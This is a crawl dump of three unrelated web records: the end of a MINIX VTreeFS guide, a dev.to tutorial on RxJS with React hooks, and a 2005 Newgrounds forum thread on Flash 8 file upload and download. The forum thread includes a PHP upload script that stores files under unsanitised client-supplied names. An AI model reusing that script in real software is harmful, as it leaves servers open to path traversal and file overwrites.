VTreeFS. Preallocate 10 inodes, which is more than we'll * need for this example. No indexed entries are used. */ start_vtreefs(&my_hooks, 10, &root_stat, 0); /* The call above never returns. This just keeps the compiler happy. */ return 0; } From the directory that contains both these files, TestFS can be built with make and installed with make install. After installation, one more step is needed before TestFS can be mounted. TestFS is a system server, so it needs its own entry in /etc/system.conf. This entry can be very simple, because TestFS needs no privileges beyond those given to it by default. The entry should therefore look like this: service testfs { }; Now you should be able to mount TestFS: mount -t testfs none /mnt If everything worked as expected, a file called “test” should show up in /mnt now. If you issue cat /mnt/test, you will be presented with the current time. The time is renewed on every read. Finally, TestFS can be unmounted again with the following command: umount /mnt This document is based heavily on the original VTreeFS design document, although that document is no longer updated with changes to VTreeFS.
https://wiki.minix3.org/doku.php?id=releases:3.2.0:developersguide:vtreefs
CC-MAIN-2020-16
refinedweb
2,033
54.02
RxJS with React Adam L Barrett ・6 min read RxJS and React go together like chocolate and peanut butter: great individually but they become something incredible when put together. A quick search on npm will find a slew of hooks to connect RxJS Observables to React components, but let’s start at the beginning, because RxJS and React fit very well together "as is" because they follow the same philosophy and have very compatible APIs. A quick aside about Why RxJS. RxJS is a mature, battle hardened library for dealing with events and data flow. It is definitely going to be valuable to familiarize yourself with how it works. Let’s start with a simple example: We’ve got a simple List component here that just lists the strings it is given: const source = ['Adam', 'Brian', 'Christine']; function App() { const [names, setNames] = useState(source); return ( <div className="App"> <h1>RxJS with React</h1> <List items={names} /> </div> ); } (follow along on CodeSandbox!) Now, let’s pull those values from an RxJS Observable. Let’s start by creating an Observable with the RxJS of() function. We'll need to: - add rxjsas a dependency ( npm i rxjs, yarn add rxjsor however you need to if you're not using CodeSandbox) - import offrom rxjs Then let's create an Observable called names$, whose value is the source array: import { of } from 'rxjs'; const source = ['Adam', 'Brian', 'Christine']; const names$ = of(source); FYI: I will be following the convention of naming an Observable variable with a \$ suffix (aka Finnish Notation), which is completely optional but I think it may help for clarity while learning. Now what we want to do is synchronize the component state with the state from the Observable. This would be considered a side-effect of the React function component App, so we are going to use the useEffect() hook, which we can import from react. Inside the useEffect() callback we will: names$Observable with the subscribe()method, passing our "state setter function" setNamesas the observer argument - capture the subscriptionreturned from observable.subscribe() - return a clean-up function that calls the subscriptions .unsubscribe()method function App() { const [names, setNames] = useState(); useEffect(() => { const subscription = names$.subscribe(setNames); return () => subscription.unsubscribe(); }); return ( <div className="App"> <h1>RxJS with React</h1> <List items={names} /> </div> ); } Which at this point should look something like this: The concepts and APIs in RxJS and React are very compatible: the way useEffect aligns with an RxJS subscription and how the clean-up call is a perfect time to unsubscribe. You’ll see a lot more of that "symbiosis" as we go on. An aside about useEffect When using useEffect to synchronize component state to some "outer" state, you must decide what state you want to sync with. - All state - No state - Some select pieces of state This is represented in the deps array, which is the second argument passed to useEffect. To use an quote from Ryan Florence: useEffect(fn) // all state useEffect(fn, []) // no state useEffect(fn, [these, states]) So, in this instance we don't have any props or other state to sync with: we just want our names array to be whatever is the current value of our Observable. We just want to update our component state whenever the Observables value changes, so we’ll go with No State and throw in an empty array [] as the second argument. useEffect(() => { const subscription = names$.subscribe(setNames); return () => subscription.unsubscribe(); }, []); Creating a custom hook It looks like we'll be using this pattern a lot: - subscribing to an Observable in useEffect - setting the state on any changes - unsubscribing in the clean-up function ...so let’s extract that behaviour into a custom hook called useObservable. const useObservable = observable => { const [state, setState] = useState(); useEffect(() => { const sub = observable.subscribe(setState); return () => sub.unsubscribe(); }, [observable]); return state; }; Our useObservable hook takes an Observable and returns the last emitted value of that Observable, while causing a re-render on changes by calling setState. Note that our state is initialized as undefined until some value is emitted in the Observable. We'll use that later, but for now, make sure the components can handle when the state is undefined. So we should have something like this now: Of course, we could, and probably should, have useObservable() defined as an export from a module in its own file because it is shareable across components and maybe even across apps. But for our simple example today, we'll just keep everything in one file. Adding some asynchronicity So we’ve got this list of names showing now, but this is all very boring so far, so let’s do something a little more Asynchronous. Let’s import interval from rxjs and the map operator from rxjs/operators. Then, let's use them to create on Observable that only adds a name to the list every second. import { interval } from 'rxjs'; import { map } from 'rxjs/operators'; const source = ['Adam', 'Brian', 'Christine']; const names$ = interval(1000).pipe(map(i => source.slice(0, i + 1))); Neat. So we can see our list appearing one at a time. Sort of useless, but off to a good start. 😄 Fetching some data Instead of our source array, let’s fetch the list of names from an API. The API endpoint we’ll be using comes from randomuser.me, which is a nice service for just getting some made up user data. We’ll add these 2 helper variables, api and getName which will allow us to fetch 5 users at a time and the function will help extract the name from the user data randomuser.me provides. const api = ``; const getName = user => `${user.name.first} ${user.name.last}`; RxJS has some great utility functions for fetching data such as fromFetch and webSocket, but since we are just getting some JSON from an ajax request, we’ll be using the RxJS ajax.getJSON method from the rxjs/ajax module. import { ajax } from 'rxjs/ajax'; const names$ = ajax .getJSON(api) .pipe(map(({ results: users }) => users.map(getName))); This will fetch the first 5 users from the API and map over the array to extract the name from the name.first and name.last property on each user. Now our component is rendering the 5 names from the API, yay! It's interesting to note here, that since we moved our code into a custom hook, we haven't changed the component code at all. When you decouple the data from the display of the component like this, you get certain advantages. For example, we could hook up our Observable to a websocket for live data updates, or even do polling in a web-worker, but the component doesn't need to change, it is happy rendering whatever data it is given and the implementation of how the data is retrieved is isolated from the display on the page. Aside about RxJS Ajax One of the great benefits of using the RxJS ajax module (as well as fromFetch), is that request cancellation is built right in. Because our useObservable hook unsubscribes from the Observable in the clean-up function, if our component was ever “unmounted” while an ajax request was in flight, the ajax request would be cancelled and the setState would never be called. It is a great memory safe feature built in without needing any extra effort. RxJS and React working great together, out of the box, again. Actions So now we have this great custom hook for reading state values off an Observable. Those values can come from anywhere, asynchronously, into our component, and that is pretty good, but React is all about Data Down and Actions Up (DDAU). We’ve really only got the data half of that covered right now, what about the actions? In the next instalment of the series we'll explore Actions, how we model our RxJS integration after the built-in useReducer hook, and much much more. If you have any questions, feel free to post in the comments, or you can join our Bitovi community Slack at, and ask me directly. There are lots of other JavaScript experts there too, and it is a great place to ask questions or get some help. My React stack for 2019 Since several people recently asked me to share my ideal React stack, I decided to write it down and share it also with you. Ive used the rxjs-hooks for my logic gate simulator and it worked great! I've also used it with sapper for visual studio paint, the lack of proper ts support in sapper wasn't that good but except for that it was a really nice experience Rxjs is definitly my favorite lib to use for side projects:) Thanks mate, this has been very very helpful. The first time i ever encountered RxJS is when i started learning Angular, and i was really scared for no reason (maybe because of the Angular learning curve at the time i started learning it), then i stopped learning Angular and RxJS. This is post here marks my comeback, thanks a lot Thanks for that article! Really useful and you make RxJs easy to start with by building on your examples. Keep them coming!
https://dev.to/bitovi/rxjs-with-react-jek
CC-MAIN-2019-47
refinedweb
1,538
59.53
Opened 5 years ago Closed 5 years ago Last modified 5 years ago #20571 closed Bug (fixed) Using savepoints within transaction.atomic() can result in the entire transaction being incorrectly and silently rolled back Description Using savepoints within transaction.atomic() can result in the entire transaction being incorrectly and silently rolled back. Here is a slightly contrived example: from django.db import transaction, DatabaseError with transaction.atomic(): user = User.objects.all()[0] user.last_login = datetime.datetime.utcnow() # any change to demonstrate problem user.save() sid = transaction.savepoint() try: # Will always fail User.objects.create(pk=user.pk) transaction.savepoint_commit(sid) except DatabaseError: transaction.savepoint_rollback(sid) # outside of atomic() context - user.last_login change has not been committed! What happens is the .create() call fails and marks the outermost atomic block as requiring a rollback, so even though we call savepoint_rollback (which does exactly right thing), once we leave the outer transaction.atomic(), the entire transaction is rolled back. In the example above, this means that the change to last_login is not persisted in the database. Rather insiduously, it is done entirely silently. :) (The outer transaction.atomic() seems a little contrived but note that it is equivalent to the wrapper added by ATOMIC_REQUESTS.) I'm not entirely sure what the solution is; the transaction.atomic(savepoint=False) call within ModelBase.save_base simply does not (and cannot) know that some other code will manually handle the savepoint rollback and thus no choice but to mark the entire transaction as borked. The only way it could know is if .create and .save took yet another kwarg, but this seems bizarre and would not be at all obvious. Maybe manual savepoints should be become a private API after all (contradicting the current note in the documentation). Alternatively, it could be clarified that "manual" savepoint management they should not be used in conjunction with atomic() blocks (and thus ATOMIC_REQUESTS). The behaviour above is certainly not obvious at all. (Hm, update_or_create uses savepoints manually, I hope that isn't breaking installations?) Change History (13) comment:1 Changed 5 years ago by comment:2 follow-up: 4 Changed 5 years ago by One solution is to remove the savepoint=False option. But it was included for two good reasons: - it improves performance, - it avoids breaking all assertNumQueries with extra SAVEPOINT / RELEASE SAVEPOINT queries. Another solution is to discourage using the low level API. Technically, the inner block in the example above is strictly equivalent to: with transaction.atomic(): User.objects.create(pk=user.pk) I'm in favor of the second solution because I still have to see a use case that isn't covered by transaction.atomic(). There aren't many patterns for using savepoints in an application. comment:3 Changed 5 years ago by This is the idea I was considering: - seems to work OK. comment:4 Changed 5 years ago by Technically, the inner block in the example above is strictly equivalent to: with transaction.atomic(): User.objects.create(pk=user.pk) Yes, although one still needs to catch the DatabaseError to be literally identical. :) I'm in favor of the second solution because I still have to see a use case that isn't covered by transaction.atomic(). There aren't many patterns for using savepoints in an application. Just for clarity: I assume here you mean there aren't many patterns for using savepoints *that are not also covered by using transaction.atomic*. I wonder if savepoint_commit() and savepoint_rollback() could just mark the transaction block as "correct" again. Wouldn't this solve the problem? No. That's too blunt as there is no way to know we are rolling back to a savepoint that results in a clean block. I'm not explaining that very well, so here's an untested example: with transaction.atomic(): s1 = transaction.savepoint() try: User.objects.create(pk=user.pk) except DatabaseError: # block now correctly marked as requiring rollback s2 = transaction.savepoint() # [..] transaction.savepoint_rollback(s2) # Oops. Assuming your solution, the block would now be incorrectly # marked as *not* requiring rollback even though it is required # due to the User.objects.create failure. We would only be able to # mark the block as clean if we rolled back to s1, but we have no # way of knowing that. comment:5 Changed 5 years ago by [Reverting to "bug"; seemed like an accidental change considering the severity is "release blocker".] comment:6 Changed 5 years ago by I see. But isn't this a problem in current Django code, too: with transaction.atomic(): try: User.objects.create(pk=user.pk) # exception marks connection needing rollback except Exception: with transaction.atomic(): # do something that raises exception # exception marks needs_rollback = False # Whoops, the outer block is marked clean! comment:7 Changed 5 years ago by I was wrong in the above example, the second transaction.atomic() doesn't create any savepoints as the whole transaction needs to be rolled back anyways. Thus the needs_rollback flag isn't cleared. I updated the patch. Now you can't create savepoints in failed blocks, so s2 in the example of comment:4 would fail. This seems good enough, there really isn't any point in creating a savepoint which is going to be rolled back anyways. As for do we need the ability to use manual savepoints? If possible, yes. Some things become nasty to code if your only option is using exceptions. Say, you call a method, and if that method returns false you will need to rollback the current savepoint. Options: def myf(): sp = savepoint() if somemethod(): savepoint_commit() else: savepoint_rollback() def myf(): try: with atomic(): if somemethod(): return else: raise FakeException # This will now rollback the savepoint. except FakeException: return Another situation where atomic() isn't easy is if you have different paths for enter and exit. Then naturally any with statement can't be used. An example is TransactionMiddleware. comment:8 Changed 5 years ago by comment:9 Changed 5 years ago by Anssi, I read your code, I read your arguments, and I understand what you're trying to achieve, but I don't think that's the right way. My work on transactions sets up a strict top-down control flow. The high-level API ( atomic) drives the low-level APIs ( commit/rollback, savepoint_commit/rollback). The low-level API never hooks back up inside the high-level API. (Well, right now commit/rollback still reset the dirty flag, but that's deprecated and going away.) Your proposal introduces a reversed control flow, making it harder to reason about the behavior, and I'm not comfortable with that. My instinct initially told me not to include the savepoint=False option. I eventually added it because you convinced me it was important and I couldn't find any way to break it. However, this ticket shows that I wasn't creative enough. Every additional complexity creates a risk of unforeseen interactions, and I'm becoming paranoid, because any transaction-related bug is a data loss bug. In addition to the two proposals I made in comment 2, here's a third one: add an advanced API to mark the innermost atomic block as needing or not needing rollback. This solution /probably/ works as expected, since the only purpose of needs_rollback is to declare that an inner atomic block without a savepoint exited with an exception and the innermost atomic block that has a savepoint should exit with a rollback. By resetting needs_rollback, you disable this behavior, which is the root cause of the bug described here. As a matter of fact, that's already what I'm doing in TestCase._fixture_teardown, except I'm forcing a rollback instead of preventing one. So we have two solutions: document needs_rollback as a public API, or introduce a getter and a setter around needs_rollback. I'm in favor of the second solution since it allows the API to live in django.db.transaction. Proof of concept patch coming shortly. comment:10 Changed 5 years ago by I've written the patch and I'm now 100% sure it's the way to go. I'm committing it. comment:11 Changed 5 years ago by comment:12 Changed 5 years ago by comment:13 Changed 5 years ago by I think Django should prevent running *anything else* than rollback or savepoint rollback once inside a transaction that is marked as needs_rollback. This is what PostgreSQL does, and with good reason - letting users continue a transaction that will be rolled back anyways will lead to errors. Addition of needs_rollback API lets users continue after errors when needed, but do so only explicitly. BTW I think I proposed adding @in_transaction decorator, not atomic(savepoint=False). This would have been no-op if a transaction was going on, otherwise it would have created a transaction. This is subtly different from @atomic(savepoint=False) which marks the outer block for needs_rollback on errors. @in_transaction is what is needed by model.save() for example (and yes, using savepoints unconditionally in that case is too expensive). In any case, this ticket is already solved so time to move on. Ill mark this as release blocker, seems like some solution is going to be needed... I haven't tested anything, but I feel confident enough in the report to just mark this accepted, too. I wonder if savepoint_commit() and savepoint_rollback() could just mark the transaction block as "correct" again. Wouldn't this solve the problem?
https://code.djangoproject.com/ticket/20571
CC-MAIN-2018-17
refinedweb
1,572
57.16
A scala method gets an input and should operate either on the input directly or a calculation of it, for instance consider the following code: def foo (b : Boolean, input : Any): Unit ={ val changedInput = {if (b) input else bar(input) } dowork (changedInput) } There is no anonymous function in your example. And the code you write, IMO, is just fine. I guess you regard {if (b) input else bar(input) } as anonymous function. It is called "block" in scala, which is just a expression whose value is the last expression contained in the block. For instance, The value of { expr1; expr2; expr3} is the value of expr3. So your code can just be written as def foo (b : Boolean, input : Any): Unit ={ val changedInput = if (b) input else bar(input) dowork (changedInput) } since there is only one expression in your block.
https://codedump.io/share/ZPtxiRwulqPf/1/scala-newbie---if-else
CC-MAIN-2017-34
refinedweb
140
65.25
MEX or MATLAB executable refers to programs that are automatically loaded and can be called like any MATLAB® function. C++ MEX functions are based on two C++ APIs: The MATLAB Data API supports MATLAB data types and optimizations like copy-on-write for data arrays passed to MEX functions. For more information, see MATLAB Data API. A subset of the MATLAB C++ Engine API supports calling MATLAB functions, execution of statements in the MATLAB workspace, and access to variables and objects. For more information, see C++ MEX API. The C++ MEX API supports C++11 features and is not compatible with the C MEX API. You cannot mix these APIs in a MEX file. A C++ MEX function is implemented as a class named MexFunction that inherits from matlab::mex::Function. The MexFunction class overrides the function call operator, operator(). This implementation creates a function object that you can call like a function. Calling the MEX function from MATLAB instantiates the function object, which maintains its state across subsequent calls to the same MEX function. Here is the basic design of a C++ MEX function. It is a subclass of matlab::mex::Function that must be named MexFunction. The MexFunction class overrides the function call operator, operator(). #include "mex.hpp" #include "mexAdapter.hpp" class MexFunction : public matlab::mex::Function { public: void operator()(matlab::mex::ArgumentList outputs, matlab::mex::ArgumentList inputs) { // Function implementation ... } }; Inputs and outputs to the MEX function are passed as elements in a matlab::mex::ArgumentList. Each input or output argument is a matlab::data::Array contained in the matlab::mex::ArgumentList. For an example, see Create a C++ MEX Source File. To call a MEX function, use the name of the file, without the file extension. The calling syntax depends on the input and output arguments defined by the MEX function. The MEX file must be on the MATLAB path or in the current working folder when called. These examples illustrate the implementation of C++ MEX Functions: arrayProduct.cpp — Multiplies an array by a scalar input and returns the resulting array. yprime.cpp — Defines differential equations for restricted three-body problem. phonebook.cpp — Shows how to manipulate structures. modifyObjectProperty.cpp — Shows how to work with MATLAB.
https://www.mathworks.com/help/matlab/matlab_external/c-mex-functions.html
CC-MAIN-2021-17
refinedweb
369
50.12
PyQT5 kernel getting dead while launching a simple programme.. Hiiii everyone, I am new using lib PyQT5. I wondering why my computer crash when try this code ? from PyQt5 import QtGui from PyQt5.QtWidgets import QApplication, QMainWindow import sys class Window(QMainWindow): def __init__(self): super().__init__() self.title = "PyQt5 Window" self.top = 100 self.left = 100 self.width = 680 self.height = 500 self.InitWindow() def InitWindow(self): self.setWindowTitle(self.title) self.setGeometry(self.top,self.left,self.width,self.height) self.show() App = QApplication(sys.argv) window = Window() sys.exit(App.exec()) the kernel is getting dead... - SGaist Lifetime Qt Champion Hi and welcome to devnet, What version of PyQt5 are you using ? What version of Qt is it built on ? How did you install both of them ? What Linux flavour are you running ? What graphics card do you have ? What driver are you using for it ? What do your kernel logs tell you ?
https://forum.qt.io/topic/101440/pyqt5-kernel-getting-dead-while-launching-a-simple-programme
CC-MAIN-2019-30
refinedweb
156
56.93
NAME clone, __clone2 - create a child process SYNOPSIS #define _GNU_SOURCE #include <sched.h> int clone(int (*fn)(void *), void *child_stack, int flags, void *arg, ... /* pid_t *pid, struct user_desc *tls, pid_t *ctid */ ); DESCRIPTION clone() creates a new process, in a manner similar to fork(2). It is actually_NEWNS (since Linux 2.4.19) Start the child in a new namespace. Every process lives in a namespace. The namespace of a process is the data (the set of mounts) describing the file hierarchy as seen by that process. After a fork(2) or clone(). VERSIONS There is no entry for clone() in libc5. glibc2 provides clone() as described in this manual page. CONFORMING TO The clone() and sys_clone calls. On ia64, a different system call is used: int __clone2(int (*fn)(void *), void *child_stack_base, size_t stack_size, int flags, void *arg, ... /* pid_t *pid, struct user_desc *tls, pid_t *ctid */ ); The __clone2() system call operates in the same way as clone(), except that child_stack_base points to the lowest address of the child’s stack area, and stack_size specifies the size of the stack pointed to by child_stack_base. BUGS Versions of the GNU C library that include the NPTL threading library contain a wrapper function for getpid(2) that performs caching of PIDs. In programs linked against such libraries, calls to getpid(2) may return the same value, even when the threads were not created using CLONE_THREAD (and thus are not in the same thread group). To get the truth, it may be necessary to use code such as the.
http://manpages.ubuntu.com/manpages/hardy/man2/__clone2.2.html
CC-MAIN-2015-14
refinedweb
254
73.07
As we are moving away from rich and compiled web client platforms like Java Applets, Flash, and Silverlight, we are filling the gap using complex JavaScript code and HTML5/CSS3 animations. That is all fine until the amount of JavaScript code in the project gets so big that it starts to be scary. Suddenly no one really wants to touch the codebase as even renaming a variable can be painful and error prone. The development slows down and the quality declines. When we generally talking about compiling the source to detect errors we are not really referring to the whole compilation process which would include: lexical analysis, preprocessing, parsing, semantic analysis, code generation, and code optimization. Most likely we are only interested in the first four steps, the actual code generation and optimization is not essential for catching errors early on. Compiling JavaScript The term can be a bit misleading as the result of this process in not a binary that looks and feels different from the source, but a checked and optimized version of the original source. Statically checking the source in some cases is quite easy, we just have to partially emulate the JavaScript engine and check whether the basic references are okay in the code. The following is quite easy to catch: function hello(name){ window.console.log("hello "+ name); } hello(); // missing parameter However, the following is a bit harder: … hello(null); // will print “hello null” From the first look, it’s okay as hello() requires a parameter and null is a parameter. However, running the code would give an undesired result. As the JavaScript language itself does not solve issues like this, usually all compilers accept hints in forms of comments: /** * @param {string} name */ function hello(name){ window.console.log("hello "+ name); } hello(null); // the compiler would catch this In this case the compiler will use the hint and give a warning: WARNING - actual parameter 1 of hello does not match formal parameter. This gives more feedback to the developer than a Java or C# compiler as by default null is not accepted: if we expect string it means it has to have a value! Google Closure Compiler One of the best JavaScript compilers is Google Closure Compiler that can be very strict with our code and check and enforce all Java like rules. A nice feature of the tool is that our compiled code is smaller and theoretically faster running than the original one. Of course the real value comes from the parsing and statically checking our code, but having a harder to read production JavaScript code can be handy sometimes. Renaming, extern and export One of the very important things about Closure Compiler is that it will rename any variables and functions and update the references too to make the code more compact. Variable names help us to read the code but for the machine they are just strings. Compiling the above code with: java -jar compiler.jar --js jsdemo.js --compilation_level=ADVANCED_OPTIMIZATIONS --warning_level VERBOSE Would yield: function a(b){window.console.log("hello "+b)}a(null); However, this can be dangerous as maybe someone wants to call the hello() function from a different, not compiled codebase. To hint the compiler not to rename something, we have a couple of options. Store it explicitly in the global namespce: … window.['hello'] = hello; Will compile to: function a(b){window.console.log("hello "+b)}window.hello=a;a(null); Even though the hello() function is renamed, a reference is kept to it under name “hello”. This way the code can be still shorter but any external dependencies are still intact. The other option if we want to keep a property/method name intact within an object, we can expose it: /** @expose */ myClass.prototype.myProperty = ''; This can be useful if we need to match the object to a remote system, like mapping JSON values to it from the server - who does not know anything about the compilation. The third option is to use externs. When we are using external libraries (like jQuery), the compiler will always warn us that: $('#div').hide(); ERROR - variable $ is undeclared To solve this issue, we simply need to download the jQuery extern file (link below) and use it as an extern. Note: if you can, use the actual library as an extern. In jQuery case the annotations aren't too good, so the compiler throws a lot of warning. Just use the jQuery extern file: java -jar closure-compiler-latest/compiler.jar --js jsdemo.js --externs externs.js --compilation_level=ADVANCED_OPTIMIZATIONS --warning_level VERBOSE The code now compiles without warnings. Tree shaking, dead code removal One of the really interesting ideas about Closure Compiler is that just like any reasonable compiler it would simply drop the code that we are not calling at all. This process is called tree shaking or dead code removal and the basic idea is that the compiler builds a logical tree of the code dependencies and anything that is not part of this graph is considered dead, so removed - or actually just not added to the output. The following code: /** * @constructor */ var Hello = function(){} /** * @param {string} name */ Hello.prototype.hello = function(name){ window.console.log("hello " + name); } var h = new Hello(); compiles to an empty string. And that is a good thing – the compiler recognized that hello is never called, the constructor is empty so it’s safe to remove this whole block. Using this method the code we compile for every actual webpage might be significantly smaller than just compiling the whole codebase together. Maybe on our home page we don’t use alerts or our AJAX library – so those can go too. Namespaces Of course Closure Compiler in not without it’s faults either, so it can be a bit annoying sometimes, complaining about things that are not really problems. Let’s say we are working in the “m” namespace, so every file would start with the namespace declaration: var m = m || {}; m.myFunc = function(){…} This code is perfectly valid, will not destroy m as it will reassign its original value if it is not null or undefined. However, Closure Compiler would think this would wipe the m variable so will give the namespace warning: namespace {name of object} should not be redefined if having Unfortunately this warning cannot be suppressed using JavaScript annotation, so one way to work around this is to make it look like a normal variable, not a namespace: var m = m || new Object(); as the var x = x || {} form is a hard wired namespace declaration for Closure, we can cheat and define the same using a bit different syntax. However, this will give us duplicate warning: ERROR - Variable m first declared in … Now, that’s an easy one, let’s just force the compiler to ignore that: /** @suppress{duplicate} */ var m = m || new Object(); All good, we define the namespace if it was not defined or just reuse it if it was there – without compiler warning. Writing JavaScript code is not just adding an alert box any more. Almost all web pages have quite large codebase but we neither take JavaScript unit testing seriously nor compile the code to make sure it looks any reasonable at all. Turning on the ADVANCED_OPTIMIZATIONS on Closure Compiler might not be for everyone as a first step, but running even the basic checks can yield surprising result. Give it a go! Download Closure Compiler then check How to annotate JavaScript code for the compiler. When using external libraries, make sure you download the Closure Externs for it. very nice post, i surely enjoy this internet web page, carry on it php blogging platform
http://blog.teamleadnet.com/2013/04/compiling-javascript-code-to-detect.html
CC-MAIN-2019-26
refinedweb
1,277
59.03
1) Realtime scale of selected/all Locators, Spheres (see below), or Joints (selection is retained until updated) 2) Add implicit spheres to transform of selected/all Joints. This fixes the problem of not being able see joint rotation because the joint shapeNodes don't rotate. 3) Toggle LRA, set Joint Orient to 0 for selected/all Joints 4) Add joints at selected verts. 5) Bind/Unbind skin. New joints added to hierarchy will be added when skin is re-bound 6) Convenient Undo (same as Maya undo) I find this useful, but I'm the only one who's ever used it. As always, use with caution. Script is Python. Tested in 2012. Not sure how far back it is compatible. To run: import pixL_faceJointer To reopen after closing: reload (pixL_faceJointer) Please use the Feature Requests to give me ideas. Please use the Support Forum if you have any questions or problems. Please rate and review in the Review section.
https://www.highend3d.com/maya/script/pixls-facejointer-for-maya
CC-MAIN-2019-26
refinedweb
160
75.5
Lost Outpost The sequel to "Outpost:Haven"3.97 / 5.00 16,289 Views Find The Candy Hunt The Candy!!!3.84 / 5.00 9,111 Views Cyber Rush A thrilling rush through cyberspace!3.77 / 5.00 24,283 Views FLASH 8 ONLY. AS:Main - if you don't have it bookmarked already I'm gonna kick you. Hard. Ok, so what I'm going to teach you is how to add upload/download functionality to your flashes. The upload will need a server, I'll post one that I found in the Flash help section (I don't know php at all) but I haven't tested it as I have only tested the upload locally. First things first, here is an example. Now here is what you will be using: import flash.net.FileReference - Imports the class file you need to be able to use the FileReference class, you must always import this when using uploading/downloading. FileReference - This is a reference to a file hosted either locally for uploading or globally (well, whatever the word is for online) for downloading. Listener - You will need to use a listener only if you want to allow uploading. --- That's the main part, now here are the example codes: UPLOADING //place on main timeline, give upload button instance of uload //make a loader component, give it an instance of loadImg System.security.allowDomain(" lpexamples.com"); //that allows the flash to interact with the site hosting the server import flash.net.FileReference; var myFileRef:FileReference = new FileReference(); //creates a new instance of the FileReference class var selectListen:Object = new Object(); selectListen.onSelect = function(file:FileReference){ trace("name: "+file.name); trace("size: "+file.size); trace("type: "+file.type); file.upload(" lash/file_io/uploadFile.php"); loadImg.load(" flash/file_io/images/"+file.name); }; myFileRef.addListener(selectListen); //creates a new listener object, applies actions and then adds it to the file reference uload.onPress = function() { //when the button with the instance name is pressed, do the following actions myFileRef.browse([{description:"Image Files", extension:"*.jpg"}]); //opens the browse window, only allowing the use to upload jpg files } DOWNLOADING //place on main timeline, give download button instance of dload import flash.net.FileReference; var myFileRef:FileReference = new FileReference(); dload.onPress = function() { //when the button with the instance name is pressed, do the following actions myFileRef.download("file url", "default file name.file extension"); //opens the browse window, only allowing the use to upload jpg files } Questions? Sup, bitches :) Nice, looks useful wtfbbqhax it isn't as well explained as I want, but it's still very useful, thanks At 9/17/05 03:29 PM, Inglor wrote: it isn't as well explained as I want, but it's still very useful, thanks You have to find something you don't like, just because I taught you something.. <3 Just ask if you don't understand anything. Sup, bitches :) Heh, I just realised something.. on the example when you upload an image, it probably won't open the first time. Try again and it will, it's because I set the loader to load the file before it had finished uploading XD Sup, bitches :) I have a question, is there a file property to see the location of it? Say i want to make an mp3 player, and use the browse function, does it show the C:\Blah\file.mp3 location? wtfbbqhax kwl i was wonderin about this for a while thx liam but only flash 8... is there a way to do it for mx 2004 pro ? Danny At 9/17/05 03:39 PM, fwe wrote: I have a question, is there a file property to see the location of it? Say i want to make an mp3 player, and use the browse function, does it show the C:\Blah\file.mp3 location? There isn't exactly, you could use a server to upload the files to temporarily, then play from there. Say you had uploaded the file to, then you would access the file with ""+file.name which is how I did it (badly) with the images in my example. If the flash is run locally and the destination file you want is in the same location as the flash then you would just need to load file.name, but that's unlikely. Sup, bitches :) what the uploadFile.php? is there anyway that you can just upload the image directly into flash? (im not botherd bout downloading, just uploading) using ShamelessPlug; NapePhysicsEngine.advertise(); At 9/23/05 11:37 AM, dELta_Luca wrote: is there anyway that you can just upload the image directly into flash? (im not botherd bout downloading, just uploading) I don't think so, but you could try playing around with it. Sup, bitches :) lol haha rite is there a way to put the uploaded image into a empty movie clip or somin which can be printed of later? Looked in the helpfile, and I can't seem to find the php code... wtfbbqhax At 10/29/05 12:46 PM, fwe wrote: Looked in the helpfile, and I can't seem to find the php code... Sup, bitches :) At 10/29/05 12:51 PM, -liam- wrote:At 10/29/05 12:46 PM, fwe wrote: Looked in the helpfile, and I can't seem to find the php code... Yeah, but doesn't it give the source code so we can put it in our own websites? wtfbbqhax At 10/29/05 12:56 PM, fwe wrote: Yeah, but doesn't it give the source code so we can put it in our own websites? Ah, here it is.. Flash Help > Learning ActionScript 2.0 in Flash > Working With External Data > About File Uploading and Downloading > Adding File Upload Functionality > Click the "to create a..." link. <?php $MAXIMUM_FILESIZE = 1024 * 200; // 200KB $MAXIMUM_FILE_COUNT = 10; // keep maximum 10 files on server echo exif_imagetype($_FILES['Filedata']); if ($_FILES['Filedata']['size'] <= $MAXIMUM_FILESIZE) { move_uploaded_file($_FILES['Filedata']['tm p_name'], "./temporary/".$_FILES['Filedata']['name'] ); $type = exif_imagetype("./temporary/".$_FILES['Fil edata']['name']); if ($type == 1 || $type == 2 || $type == 3) { rename("./temporary/".$_FILES['Filedata'][ 'name'], "./images/".$_FILES['Filedata']['name']); } else { unlink("./temporary/".$_FILES['Filedata'][ 'name']); } } $directory = opendir('./images/'); $files = array(); while ($file = readdir($directory)) { array_push($files, array('./images/'.$file, filectime('./images/'.$file))); } usort($files, sorter); if (count($files) > $MAXIMUM_FILE_COUNT) { $files_to_delete = array_splice($files, 0, count($files) - $MAXIMUM_FILE_COUNT); for ($i = 0; $i < count($files_to_delete); $i++) { unlink($files_to_delete[$i][0]); } } print_r($files); closedir($directory); function sorter($a, $b) { if ($a[1] == $b[1]) { return 0; } else { return ($a[1] < $b[1]) ? -1 : 1; } } ?> Sup, bitches :) At 9/23/05 11:37 AM, dELta_Luca wrote: is there anyway that you can just upload the image directly into flash? (im not botherd bout downloading, just uploading)(); i didnt make this, its the example for browse in the dictionary. does anyone know how i would access this file after uploading it? Thanks to this topic,I've just now figured out how to use the Button Component. I've never really looked at it,and Flash told me what to do. How did you do so the image were showed on the screen? very cool - Matt, Rustyarcade.com Nevermind, I figured it out :P so how would i play a sound that i just uploaded into the flash player? ok i just realised that i have to upload it to a server. so this changes alot. so is there a way to get the filepath of a file you just selected. Very helpful. Lol, I haven't bookmarked it yet, and I never will!!! At 12/26/05 01:03 PM, TheFlashCat wrote: Very helpful. Lol, I haven't bookmarked it yet, and I never will!!! LOL!!!!! dumbass wtfbbqhax At 12/26/05 01:12 PM, fwe wrote:At 12/26/05 01:03 PM, TheFlashCat wrote: Very helpful. Lol, I haven't bookmarked it yet, and I never will!!!LOL!!!!! dumbass LOL!!! ZOMG!!!1 GO TO TEH HELL!!!!!!1111!!!!! This question may be better suited for the programming forum but I thought I would ask here first anyway. When using the example code that the actionscript documentation / above provids with macromedia/adobe's test server it works perfectly. When try it on my server Flash thinks that it uploads everything fine and then throws itself into an infinite loop trying to download a file that's not there. When I check the server the file was never uploaded. I have PHP 5.0.4 installed and working (it works great with the MySQL I was playing with yesterday). I created images and temporary subfolders on the server. I changed all of the url's in both the fla and php documents. Any ideas? Has anybody gotten this to work on their own servers? Can a jpg from a web page be directly downloaded and put in a movieclip/bitmap directly without a browser popping up? (except the one from firewall). AS:Main - if you don't have it bookmarked already I'm gonna kick you. Hard. punish me master wwoohh i saw the demo and that was like.... wooooah
http://www.newgrounds.com/bbs/topic/346302
CC-MAIN-2013-48
refinedweb
1,518
65.32
